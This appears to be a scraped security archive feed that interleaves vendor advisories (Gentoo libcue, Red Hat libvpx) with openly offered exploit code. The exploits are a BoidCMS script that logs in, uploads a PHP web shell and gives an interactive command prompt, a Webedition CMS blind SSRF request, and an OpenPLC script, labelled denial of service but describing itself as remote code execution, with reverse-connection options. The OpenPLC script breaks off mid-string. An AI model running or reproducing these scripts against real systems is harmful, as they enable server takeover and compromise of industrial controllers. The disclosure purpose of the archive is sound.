Gentoo Linux Security Advisory 202310-10 - A vulnerability has been discovered in libcue which could allow for arbitrary code execution. Versions greater than or equal to 2.2.1-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: libcue: Arbitrary Code Execution  
     Date: October 10, 2023  
     Bugs: #915500  
       ID: 202310-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in libcue which could allow for  
arbitrary code execution.

Background  
==========

libcue is a CUE Sheet Parser Library.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
media-libs/libcue  < 2.2.1-r1    >= 2.2.1-r1

Description  
===========

libcue does not check bounds in a loop and suffers from an integer  
overflow flaw which can be exploited to take over the program.

Impact  
======

Untrusted CUE sheet files can lead to arbitrary code execution.

app-misc/tracker-miners[cue] uses libcue to index CUE Sheet files in  
directories. It is possible that downloading a malicious CUE Sheet file  
into a directory indexed by tracker-miners could lead to remote code  
execution.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All libcue users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/libcue-2.2.1-r1"

References  
==========

[ 1 ] CVE-2023-43641  
      https://nvd.nist.gov/vuln/detail/CVE-2023-43641

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-10

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-10

BoidCMS versions 2.0.0 and below suffer from a remote shell upload vulnerability.

    #!/usr/bin/python3# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability# Date: 08/21/2023# Exploit Author: 1337kid# Vendor Homepage: https://boidcms.github.io/#/# Software Link: https://boidcms.github.io/BoidCMS.zip# Version: <= 2.0.0# Tested on: Ubuntu# CVE : CVE-2023-38836import requestsimport reimport argparseparser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')parser.add_argument("-u", "--url", help="website url")parser.add_argument("-l", "--user", help="admin username")parser.add_argument("-p", "--passwd", help="admin password")args = parser.parse_args()base_url=args.urluser=args.userpasswd=args.passwddef showhelp():  print(parser.print_help())  exit()if base_url == None: showhelp()elif user == None: showhelp()elif passwd == None: showhelp()with requests.Session() as s:  req=s.get(f'{base_url}/admin')  token=re.findall('[a-z0-9]{64}',req.text)  form_login_data={    "username":user,    "password":passwd,    "login":"Login",  }  form_login_data['token']=token  s.post(f'{base_url}/admin',data=form_login_data)  #=========== File upload to RCE  req=s.get(f'{base_url}/admin?page=media')  token=re.findall('[a-z0-9]{64}',req.text)  form_upld_data={    "token":token,    "upload":"Upload"  }  #==== php shell  php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']  with open('shell.php','w') as f:    f.writelines(php_code)  #====  file = {'file' : open('shell.php','rb')}  s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)  req=s.get(f'{base_url}/media/shell.php')  if req.status_code == '404':    print("Upload failed")    exit()  print(f'Shell uploaded to "{base_url}/media/shell.php"')  while 1:    cmd=input("cmd >> ")    if cmd=='exit': exit()    req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})    print(req.text)

BoidCMS 2.0.0 Shell Upload

Red Hat Security Advisory 2023-5538-01 - The libvpx packages provide the VP8 SDK, which allows the encoding and decoding of the VP8 video codec, commonly used with the WebM multimedia container file format. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libvpx security update  
Advisory ID:       RHSA-2023:5538-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5538  
Issue date:        2023-10-09  
CVE Names:         CVE-2023-5217 CVE-2023-44488   
=====================================================================

1. Summary:

An update for libvpx is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

The libvpx packages provide the VP8 SDK, which allows the encoding and  
decoding of the VP8 video codec, commonly used with the WebM multimedia  
container file format.

Security Fix(es):

* libvpx: Heap buffer overflow in vp8 encoding in libvpx (CVE-2023-5217)

* libvpx: crash related to VP9 encoding in libvpx (CVE-2023-44488)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, all applications using libvpx must be  
restarted for the changes to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2241191 - CVE-2023-5217 libvpx: Heap buffer overflow in vp8 encoding in libvpx  
2241806 - CVE-2023-44488 libvpx: crash related to VP9 encoding in libvpx

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
libvpx-1.7.0-10.el8_6.src.rpm

aarch64:  
libvpx-1.7.0-10.el8_6.aarch64.rpm  
libvpx-debuginfo-1.7.0-10.el8_6.aarch64.rpm  
libvpx-debugsource-1.7.0-10.el8_6.aarch64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.aarch64.rpm

ppc64le:  
libvpx-1.7.0-10.el8_6.ppc64le.rpm  
libvpx-debuginfo-1.7.0-10.el8_6.ppc64le.rpm  
libvpx-debugsource-1.7.0-10.el8_6.ppc64le.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.ppc64le.rpm

s390x:  
libvpx-1.7.0-10.el8_6.s390x.rpm  
libvpx-debuginfo-1.7.0-10.el8_6.s390x.rpm  
libvpx-debugsource-1.7.0-10.el8_6.s390x.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.s390x.rpm

x86_64:  
libvpx-1.7.0-10.el8_6.i686.rpm  
libvpx-1.7.0-10.el8_6.x86_64.rpm  
libvpx-debuginfo-1.7.0-10.el8_6.i686.rpm  
libvpx-debuginfo-1.7.0-10.el8_6.x86_64.rpm  
libvpx-debugsource-1.7.0-10.el8_6.i686.rpm  
libvpx-debugsource-1.7.0-10.el8_6.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.i686.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

aarch64:  
libvpx-debuginfo-1.7.0-10.el8_6.aarch64.rpm  
libvpx-debugsource-1.7.0-10.el8_6.aarch64.rpm  
libvpx-devel-1.7.0-10.el8_6.aarch64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.aarch64.rpm

ppc64le:  
libvpx-debuginfo-1.7.0-10.el8_6.ppc64le.rpm  
libvpx-debugsource-1.7.0-10.el8_6.ppc64le.rpm  
libvpx-devel-1.7.0-10.el8_6.ppc64le.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.ppc64le.rpm

s390x:  
libvpx-debuginfo-1.7.0-10.el8_6.s390x.rpm  
libvpx-debugsource-1.7.0-10.el8_6.s390x.rpm  
libvpx-devel-1.7.0-10.el8_6.s390x.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.s390x.rpm

x86_64:  
libvpx-debuginfo-1.7.0-10.el8_6.i686.rpm  
libvpx-debuginfo-1.7.0-10.el8_6.x86_64.rpm  
libvpx-debugsource-1.7.0-10.el8_6.i686.rpm  
libvpx-debugsource-1.7.0-10.el8_6.x86_64.rpm  
libvpx-devel-1.7.0-10.el8_6.i686.rpm  
libvpx-devel-1.7.0-10.el8_6.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.i686.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-5217  
https://access.redhat.com/security/cve/CVE-2023-44488  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlJBvgAAoJENzjgjWX9erEvkwP/30BCaL+HmyVp7332j2cpmqQ  
hOYjiHO3vT31sJZ1mn+EKzNNXKqL70D93SJyPOAc3cJGPYF58HTszil1gAQ+w6pk  
1kOAB1/baFHJ0GFWGXCfDXIVPMSTSOxk5yu8GpSxU6rcpP1VAJuw2ECzFYbcpnRA  
jeOvWnpqSiO6wLbv5sTd/Pn1Pbxv3GTdhyUbKJ2cLoJphn72Qw6NHAVPIgd3hpnP  
XT2E/er3QkLFC6vBvutyslj4mayhkILnwiRYRnBLgYIWKP/4wGcWf7BpqH7meqIL  
shHIAnaslGdxXDDL6f9OnqyisdHNNw6f23sNQUE12pdWfL/dn5Ll7fgVK6aVENUQ  
OgHajCjTiXKtchwAGLQrLG6ixXs5y8cRc/rIXWg8Hif982xxoiQfrkIYxLWaKgo4  
sMvvx6YdllQJAk3NabGG2zssv2KbAOy0s8o4AFlkiH+VaORx3XujJfZH5P/lkNAr  
EXF0Sw4RgBpDpG+l0qoDVmBmWYWIMup410ZfaVPPCWaqWH8Lce1f4UBK7Ump8jqM  
NLbw1W4qvKlGLleld/BSPNO80Ndv61zLEt8mBIG3ekzDHU+PKFFb23WgqsJbEcq/  
JOttoseX7aLNodLROUe/sRPZ+hzN0YMCKaJlOni71xdKiz/2vzldqslx/igtYOwn  
qWDfQ0JQIrk6IgmJXYvE  
=x93p  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5538-01

Red Hat Security Advisory 2023-5539-01 - The libvpx packages provide the VP8 SDK, which allows the encoding and decoding of the VP8 video codec, commonly used with the WebM multimedia container file format. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libvpx security update  
Advisory ID:       RHSA-2023:5539-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5539  
Issue date:        2023-10-09  
CVE Names:         CVE-2023-5217 CVE-2023-44488   
=====================================================================

1. Summary:

An update for libvpx is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The libvpx packages provide the VP8 SDK, which allows the encoding and  
decoding of the VP8 video codec, commonly used with the WebM multimedia  
container file format.

Security Fix(es):

* libvpx: Heap buffer overflow in vp8 encoding in libvpx (CVE-2023-5217)

* libvpx: crash related to VP9 encoding in libvpx (CVE-2023-44488)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, all applications using libvpx must be  
restarted for the changes to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2241191 - CVE-2023-5217 libvpx: Heap buffer overflow in vp8 encoding in libvpx  
2241806 - CVE-2023-44488 libvpx: crash related to VP9 encoding in libvpx

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
libvpx-1.9.0-7.el9_2.src.rpm

aarch64:  
libvpx-1.9.0-7.el9_2.aarch64.rpm  
libvpx-debuginfo-1.9.0-7.el9_2.aarch64.rpm  
libvpx-debugsource-1.9.0-7.el9_2.aarch64.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.aarch64.rpm

ppc64le:  
libvpx-1.9.0-7.el9_2.ppc64le.rpm  
libvpx-debuginfo-1.9.0-7.el9_2.ppc64le.rpm  
libvpx-debugsource-1.9.0-7.el9_2.ppc64le.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.ppc64le.rpm

s390x:  
libvpx-1.9.0-7.el9_2.s390x.rpm  
libvpx-debuginfo-1.9.0-7.el9_2.s390x.rpm  
libvpx-debugsource-1.9.0-7.el9_2.s390x.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.s390x.rpm

x86_64:  
libvpx-1.9.0-7.el9_2.i686.rpm  
libvpx-1.9.0-7.el9_2.x86_64.rpm  
libvpx-debuginfo-1.9.0-7.el9_2.i686.rpm  
libvpx-debuginfo-1.9.0-7.el9_2.x86_64.rpm  
libvpx-debugsource-1.9.0-7.el9_2.i686.rpm  
libvpx-debugsource-1.9.0-7.el9_2.x86_64.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.i686.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 9):

aarch64:  
libvpx-debuginfo-1.9.0-7.el9_2.aarch64.rpm  
libvpx-debugsource-1.9.0-7.el9_2.aarch64.rpm  
libvpx-devel-1.9.0-7.el9_2.aarch64.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.aarch64.rpm

ppc64le:  
libvpx-debuginfo-1.9.0-7.el9_2.ppc64le.rpm  
libvpx-debugsource-1.9.0-7.el9_2.ppc64le.rpm  
libvpx-devel-1.9.0-7.el9_2.ppc64le.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.ppc64le.rpm

s390x:  
libvpx-debuginfo-1.9.0-7.el9_2.s390x.rpm  
libvpx-debugsource-1.9.0-7.el9_2.s390x.rpm  
libvpx-devel-1.9.0-7.el9_2.s390x.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.s390x.rpm

x86_64:  
libvpx-debuginfo-1.9.0-7.el9_2.i686.rpm  
libvpx-debuginfo-1.9.0-7.el9_2.x86_64.rpm  
libvpx-debugsource-1.9.0-7.el9_2.i686.rpm  
libvpx-debugsource-1.9.0-7.el9_2.x86_64.rpm  
libvpx-devel-1.9.0-7.el9_2.i686.rpm  
libvpx-devel-1.9.0-7.el9_2.x86_64.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.i686.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-5217  
https://access.redhat.com/security/cve/CVE-2023-44488  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlJBvQAAoJENzjgjWX9erEHmkP/j76TS36r/5pmVKxp+KznrJ2  
B60LOzDV21Hhca6NRy/moHcSIfQEkty0fxWBQ8HqNrZ0mQRZNNFz1hOXZ097eH6B  
v9fRdFMeyqT5PFpPjU5y+gmyxt43ZCh7LEPBQvMGDCnkW4M8NUbE0y9uxjMiAe19  
3zDDcLA+ssy7Z3K594ICHtuk5Rx8a5iIpRUbf63BBRTRlSPzsQ54FBi3zMSXIYDF  
lMcXbTHq8ysjjrUNDHag89Kg2Xt4XXoC9+W+E1PFqfnlZBzYttXb25yiJJfkvp9k  
s6AlYqjdQ0XHBpdiImuzknplOTFNIGfXePGM8cCqK5P752dmhg10RotbKNRCP8sj  
r/nlCUyXIV0RuFw6qDC0NFzxfXo8K/VUolHToa8BfxB+CzX+evRLDkCKJmEJv3wo  
/rt/W9lzALtXEwK+XqPs9pP/I9zRUXeaFocBKUaK8Mugiun8wwZfB5+sowa18+7V  
8Y22YmtASXuAHhPPCRa1+UWpmzEwXRQMVnQcZSZfLadBJ141lJhMlwwoxbNNz+dj  
OBERh/JYwxBLWK80wmYjUa0751umz+P8UxrqEeA0OCpZ5Zt+GG9gMbVRIeYgP1kO  
LH4h27uhhRBDZ9rRnu3h7FWezeBvRRMwsCrElyEbQa/47aCmpOFIwqdiYwN26SCF  
YMobQwgofyBKFBn5GBId  
=/LcT  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5539-01

Webedition CMS version 2.9.8.8 suffers from a blind server-side request forgery vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRFApplication: Webedition CMSVersion: v2.9.8.8   Bugs:  Blind SSRFTechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 07.09.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================write https://youserver/test.xml to we_cmd[0] parameterpoc requestPOST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1Host: localhostContent-Length: 141sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36sec-ch-ua-platform: ""Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/webEdition/index.php?we_cmd[0]=startWEAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300Connection: closewe_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3

Webedition CMS 2.9.8.8 Server-Side Request Forgery

Red Hat Security Advisory 2023-5534-01 - The libvpx packages provide the VP8 SDK, which allows the encoding and decoding of the VP8 video codec, commonly used with the WebM multimedia container file format. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libvpx security update  
Advisory ID:       RHSA-2023:5534-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5534  
Issue date:        2023-10-09  
CVE Names:         CVE-2023-5217 CVE-2023-44488   
=====================================================================

1. Summary:

An update for libvpx is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - ppc64le, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - x86_64

3. Description:

The libvpx packages provide the VP8 SDK, which allows the encoding and  
decoding of the VP8 video codec, commonly used with the WebM multimedia  
container file format.

Security Fix(es):

* libvpx: Heap buffer overflow in vp8 encoding in libvpx (CVE-2023-5217)

* libvpx: crash related to VP9 encoding in libvpx (CVE-2023-44488)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, all applications using libvpx must be  
restarted for the changes to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2241191 - CVE-2023-5217 libvpx: Heap buffer overflow in vp8 encoding in libvpx  
2241806 - CVE-2023-44488 libvpx: crash related to VP9 encoding in libvpx

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
libvpx-1.7.0-8.el8_2.src.rpm

x86_64:  
libvpx-1.7.0-8.el8_2.i686.rpm  
libvpx-1.7.0-8.el8_2.x86_64.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.i686.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.x86_64.rpm  
libvpx-debugsource-1.7.0-8.el8_2.i686.rpm  
libvpx-debugsource-1.7.0-8.el8_2.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.i686.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
libvpx-1.7.0-8.el8_2.src.rpm

ppc64le:  
libvpx-1.7.0-8.el8_2.ppc64le.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.ppc64le.rpm  
libvpx-debugsource-1.7.0-8.el8_2.ppc64le.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.ppc64le.rpm

x86_64:  
libvpx-1.7.0-8.el8_2.i686.rpm  
libvpx-1.7.0-8.el8_2.x86_64.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.i686.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.x86_64.rpm  
libvpx-debugsource-1.7.0-8.el8_2.i686.rpm  
libvpx-debugsource-1.7.0-8.el8_2.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.i686.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
libvpx-1.7.0-8.el8_2.src.rpm

x86_64:  
libvpx-1.7.0-8.el8_2.i686.rpm  
libvpx-1.7.0-8.el8_2.x86_64.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.i686.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.x86_64.rpm  
libvpx-debugsource-1.7.0-8.el8_2.i686.rpm  
libvpx-debugsource-1.7.0-8.el8_2.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.i686.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-5217  
https://access.redhat.com/security/cve/CVE-2023-44488  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlJBvQAAoJENzjgjWX9erE5MwP/3TdlO7HiAnGJ45p1iFOMXLM  
5GFa9+26vPJhvWj/NRhcd1VCSc+bPqTVehX30TZBaa9fQOKxR2OeU5o/MVijpMvh  
FV7zLc9VMVx7AG6v3fmQ2zzqgONn5l2G/6dUaVfCJ70NXb5oj3sViPNZud0MSwGa  
H+smKKCIlsySoRri2ujipY79cB8HsBpGHsj939bNJ3d/gRuqksboxsRwuAMgwIMU  
bupdSx7PBNlhLB/hoTkvLRFIqi+xyHe+VdDTGz9RFdjpTtDbGzmeD8kOxR6S0Kbi  
84FtciojYSoxY6iSaiI7LKDenRYnbFUMr6jmcDhVH2rurJdY1ztMi2SYLXJnEwoi  
1Br1WocqgsV0HQHTIZhVY/r6pDuAC2difmZ2LZgYLUCmf0MWMjv4kn30mMwdPsJ7  
V+V72BIy5BN/ATvTggnprHXMxL17WfA0bbQMbJ+UG+Vq0kubfSMjn12nrEVTxVsc  
78tfFQN+ONUTOUFcr8uo5bs2t/PY0Jkb+Tguim0JqPeUqjkeDM/upA9OwyQSEr3S  
SYAbL00ia9ZvlyURm499xDZE87fJR6Jbs1ibXRawxZWWGIfYZX0VjOV0Yd+k2EGk  
iUX/z5hiTReb0TIekiciGYr+UhaVbZJNWbLruOzPh7UQ+RbF0NAmbIOUHPuY+iXK  
KXSj7YDnAe/TEyenfuKC  
=zUAg  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5534-01

OpenPLC WebServer version 3 suffers from a denial of service vulnerability.

    # Exploit Title: OpenPLC WebServer 3 - Denial of Service# Date: 10.09.2023# Exploit Author: Kai Feng# Vendor Homepage: https://autonomylogic.com/# Software Link: https://github.com/thiagoralves/OpenPLC_v3.git# Version: Version 3 and 2# Tested on: Ubuntu 20.04import requestsimport sysimport timeimport optparseimport reparser = optparse.OptionParser()parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)")parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")parser.add_option('-p', '--passw', action="store", dest="passw", help="Pass credential to login")parser.add_option('-i', '--rip', action="store", dest="rip", help="IP for Reverse Connection")parser.add_option('-r', '--rport', action="store", dest="rport", help="Port for Reverse Connection")options, args = parser.parse_args()if not options.url:    print('[+] Remote Code Execution on OpenPLC_v3 WebServer')    print('[+] Specify an url target')    print("[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444")    exit()host = options.urllogin = options.url + '/login' upload_program = options.url + '/programs'compile_program = options.url + '/compile-program?file=681871.st' run_plc_server = options.url + '/start_plc'user = options.userpassword = options.passwrev_ip = options.riprev_port = options.rportx = requests.Session()def auth():    print('[+] Remote Code Execution on OpenPLC_v3 WebServer')    time.sleep(1)    print('[+] Checking if host '+host+' is Up...')    host_up = x.get(host)    try:        if host_up.status_code == 200:            print('[+] Host Up! ...')    except:        print('[+] This host seems to be down :( ')        sys.exit(0)    print('[+] Trying to authenticate with credentials '+user+':'+password+'')     time.sleep(1)       submit = {        'username': user,        'password': password    }    x.post(login, data=submit)    response = x.get(upload_program)                if len(response.text) > 30000 and response.status_code == 200:        print('[+] Login success!')        time.sleep(1)    else:        print('[x] Login failed :(')        sys.exit(0)  def injection():    print('[+] PLC program uploading... ')    upload_url = host + "/upload-program"     upload_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvgPw.qwEcF3rMliGcTgQ4zI4RInBZrqE"}    upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------210749863411176965311768214500", "Origin": host, "Connection": "close", "Referer": host + "/programs", "Upgrade-Insecure-Requests": "1"}     upload_data = "-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"file\"; filename=\"program.st\"\r\nContent-Type: application/vnd.sailingtracker.track\r\n\r\nPROGRAM prog0\n  VAR\n    var_in : BOOL;\n    var_out : BOOL;\n  END_VAR\n\n  var_out := var_in;\nEND_PROGRAM\n\n\nCONFIGURATION Config0\n\n  RESOURCE Res0 ON PLC\n    TASK Main(INTERVAL := T#50ms,PRIORITY := 0);\n    PROGRAM Inst0 WITH Main : prog0;\n  END_RESOURCE\nEND_CONFIGURATION\n\r\n-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload Program\r\n-----------------------------210749863411176965311768214500--\r\n"    upload = x.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data)    act_url = host + "/upload-program-action"    act_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------374516738927889180582770224000", "Origin": host, "Connection": "close", "Referer": host + "/upload-program", "Upgrade-Insecure-Requests": "1"}    act_data = "-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; 